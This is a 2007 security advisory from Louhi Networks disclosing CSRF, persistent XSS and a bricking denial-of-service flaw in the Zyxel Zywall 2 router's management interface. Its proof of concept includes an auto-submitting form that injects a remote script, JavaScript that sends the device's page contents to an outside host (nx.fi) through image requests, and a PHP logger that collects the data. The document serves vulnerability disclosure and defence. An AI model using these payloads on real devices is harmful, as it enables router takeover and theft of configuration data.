-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

                         Louhi Networks Oy
                      -= Security Advisory =-


     Advisory: Zyxel Zywall 2 Multiple vulnerabilities
 Release Date: 2007-08-10
Last Modified: 2007-08-10
      Authors: Henri Lindberg, Associate of (ISC)²
               [henri.lindberg@louhi.fi]

  Application: ZyNOS Firmware Version: V3.62(WK.6) | 06/16/2004
      Devices: Zyxel Zywall2 (possibly all other Zyxel devices using
               the same firmware)
     Severity: Moderate
       Impact: Persistent cross site scripting, cross site request
               forgery, persistant denial of service
Vendor Status: Vendor notified
   References: http://www.louhi.fi/advisory/zyxel_070810.txt


Overview:

   During an audit of Zyxel Zywall 2 it was discovered that a cross
   site request forgery and persistent cross site scripting
   vulnerability exists in the management interface.  Thus, it is
   possible for an attacker to perform any administrative actions in
   the management interface, if a logged-in/authenticated user has been
   enticed to visit a malicious web site. These actions include e.g.
   changing dns server address or other security critical configuration
   items.

   It was also discovered that it is possible to "brick" the device by
   submitting invalid configuration to the device, thus performing a
   persistant denial of service attack against it.

Details:

   Embedded device management interface does not validate the origin
   of an HTTP request. If attacker is able to make an authenticated
   user visit a hostile web page, a device can be controlled by
   submitting suitable forms. It is possible to steal information from
   the device and modify the configuration. See provided
   proof-of-concept code for more information.

   Successful attack requires that the attacker knows the management
   interface address for the target device. As the management interface
   is most usually located at the default IP address and might even have
   default password in place, performing an successful attack is not far
   fetched.

   By submitting invalid configuration to the management interface it is
   possible to perform a persistant denial of service attack against the
   device. After receiving invalid configuration, the device will reboot
   and enter an infinite reboot loop. Powering off the device, or
   pressing reset button will not help. It has not been researched if
   the device can be restored from this state (it does not have any
   reset jumpers or battery powered memory). From an ordinary consumer's
   point-of-view, the device is compeletely useless. No proof-of-concept
   code will be released, but finding this vulnerability is trivial.

More information:
   http://en.wikipedia.org/wiki/Cross-site_request_forgery

Proof of Concept:

  Include a random user-specific token in forms.

  Example form (exploits persistent XSS):

  <html>
  <body onload="document.CSRF.submit()">
  <FORM name="CSRF" METHOD="POST"
ACTION="http://192.168.1.1/Forms/General_1">
  <INPUT NAME="sysSystemName" VALUE="<script src='http://nx.fi/X'>"
  <INPUT NAME="sysDomainName" VALUE="evil.com">
  <INPUT NAME="StdioTimout" VALUE="0">
  <INPUT NAME="sysSubmit" VALUE="Apply">
  </form>
  </body>
  </html>

X:
- ------
document.write("Security Updates - <a
href='http://www.checkpoint.com/'>http://www.zyxel.com</a>");

function getPage(){
i = 0;
data = encodeURIComponent(document.body.innerHTML);


while (i < data.length)
{
  
  tmp = data.substr(i, 4096);
  (new Image()).src = "http://nx.fi/xss/getinfo.php?page=" + tmp;
  i += 4096;
}

}

setTimeout("getPage()", 1000);
- ------

getinfo.php:
- ------
<?php

$sent = isset($_REQUEST['page']);
$data = "";

if($sent)
{

  $data .= "<pre>";
  foreach($_REQUEST as $tmp) {
  $data .= htmlspecialchars(urldecode($tmp));
}

$data .= "</pre>";

$myfile = "log.html";
$handle = fopen($myfile, 'a');
fwrite($handle, $data);
fclose($handle);

}


?>
- ------

Notice that you 'system name' variable is limited in length, so you'll
need a relatively short URL.

Workaround:

Change administration password and default IP address.
Perform administration using SSH.


Disclosure Timeline:

  May  10   2007    - Contacted Zyxel by email
  May  11   2007    - Vendor responded by email
  June  7   2007    - Vendor stated that this not an urgent issue
  June 28   2007    - Provided vendor with a proof-of-concept attack
  August 10 2007    - Advisory released


Copyright 2007 Louhi Networks Oy. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (MingW32)

iEYEAREIAAYFAka8P3UACgkQ3TZNEGeZkm5eGACffzkmceMKroY4VTKxPX/ec5eH
0AsAn1uIxklFttYYlviEOJ42EXP0yTH1
=06kW
-----END PGP SIGNATURE-----